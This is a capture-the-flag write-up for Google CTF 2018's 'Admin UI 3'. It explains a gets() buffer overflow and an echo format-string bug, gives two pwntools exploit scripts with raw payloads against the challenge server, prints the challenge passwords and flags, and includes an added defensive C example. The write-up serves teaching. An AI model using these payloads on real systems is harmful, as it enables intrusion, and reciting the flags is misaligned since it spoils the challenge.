Admin UI 3 | Google CTF 2018

Posted on March 24, 2019 by Yılmaz Cemalettin

Google CTF 2018

Admin UI 3

The code quality here is terrible. Even the temperature scale is measured in “Kevins”. Just bad Q/A all around here. If they choose to measure in Kevins rather than Kelvins, then it’s a sure bet that they can’t handle their memory properly. It looks like this also controls the SmartFridge2000 internal temperature for that whole home “just-works” experience.

You can find all my CTF solutions here.

The challenge description hints at memory vulnerabilities.

When I looked at the command_line function in IDA, I saw the shell input.

When I looked at the shell function, I found the _ZL13shell_enabled flag. If this flag XOR 1 is true, debug_shell() can be called. Otherwise the shell can't be opened.

If we change the value of _ZL13shell_enabled in memory, we can open the shell.

They use the gets() function rather than fgets(), so we can use a buffer overflow.

The “echo” command also has a format string vulnerability.
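For comparison, here is how the two bugs above are closed on the defensive side. This is an added example, not code from the challenge binary or from this post: the names read_command, echo_command and CMD_MAX, the buffer size, and the sketched vulnerable pattern in the comment are all assumptions.

```c
#include <stdio.h>
#include <string.h>

#define CMD_MAX 64 /* assumed size; the challenge's real buffer size is not shown */
/* Pattern the post describes (sketched, comment only, never compiled):
 *     gets(cmd);          unbounded copy into a fixed buffer
 *     printf(cmd + 5);    user text used as the format string */

/* Bounded reader: returns the line length, -1 at end of input, or -2 when the
 * line does not fit. An overlong line is consumed whole and rejected, so its
 * tail can never be parsed as the next command. */
int read_command(FILE *in, char *buf, size_t n)
{
    size_t len = 0;
    int c, too_long = 0;
    if (n == 0)
        return -1;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (len + 1 < n)
            buf[len++] = (char)c;
        else
            too_long = 1; /* keep draining, store nothing more */
    }
    buf[too_long ? 0 : len] = '\0';
    if (too_long)
        return -2;
    return (c == EOF && len == 0) ? -1 : (int)len;
}

/* echo: the format is a constant and user text is only an argument, so
 * "%40$lln" and similar specifiers are copied out as literal characters. */
int echo_command(const char *arg, char *out, size_t n)
{
    return snprintf(out, n, "%s", arg);
}

int main(void)
{
    char cmd[CMD_MAX], out[CMD_MAX];
    int r;
    /* Feed commands on stdin, e.g. the constructed line: echo A%40$llnABC */
    while ((r = read_command(stdin, cmd, sizeof cmd)) != -1) {
        if (r == -2)
            puts("error: command too long");
        else if (strncmp(cmd, "echo ", 5) == 0 && echo_command(cmd + 5, out, sizeof out) >= 0)
            puts(out);
    }
    return 0;
}
```

Building with -Wformat -Wformat-security makes the compiler flag a non-literal format string like the one in the comment.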

 

When I tested the format string vulnerability:

First I wanted to try overflowing the buffer.

I wanted to jump to the address below, so I wrote a script for that:

.text:0000000041414227 _Z11debug_shellv proc near

```python
# Python 2 script using pwntools
from pwn import *
from struct import pack

r = remote('mngmnt-iface.ctfcompetition.com',1337)
print r.recvuntil("3) Quit")
# Choose menu option 1 and authenticate with the two passwords
r.send("1\n\n")
print "1"
print r.recvuntil("password")
r.send("CTF{I_luv_buggy_sOFtware}\n")
print "CTF{I_luv_buggy_sOFtware}\n"
print r.recvuntil("password")
r.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print "CTF{Two_PasSworDz_Better_th4n_1_k?}\n"
print r.recvuntil("Authenticated")
# Overflow the gets() buffer: 0x38 filler bytes, then 0x41414227 (debug_shell), little-endian
r.send("a"*0x38+"\x27\x42\x41\x41\x00\x00\x00\x00\n")
# Send quit, then hand the connection to the terminal
r.send("quit\n")
r.interactive()
```

Output:

CTF{c0d3ExEc?W411_pL4y3d}

I found the flag, but we can also use the format string vulnerability in echo.

I also wrote a script for that:

```python
# Python 2 script using pwntools
from pwn import *
from struct import pack

r = remote('mngmnt-iface.ctfcompetition.com',1337)
print r.recvuntil("3) Quit")
# Choose menu option 1 and authenticate with the two passwords
r.send("1\n\n")
print "1"
print r.recvuntil("password")
r.send("CTF{I_luv_buggy_sOFtware}\n")
print "CTF{I_luv_buggy_sOFtware}\n"
print r.recvuntil("password")
r.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print "CTF{Two_PasSworDz_Better_th4n_1_k?}\n"
print r.recvuntil("Authenticated")
# %40$lln stores the count of characters printed so far through the pointer in
# argument 40; the trailing 8 bytes are the little-endian address 0x41616138
r.send("echo A%40$llnABC\x38\x61\x61\x41\x00\x00\x00\x00\n")
# With the flag changed, the shell command is accepted
r.send("shell\n")
r.interactive()
```

 
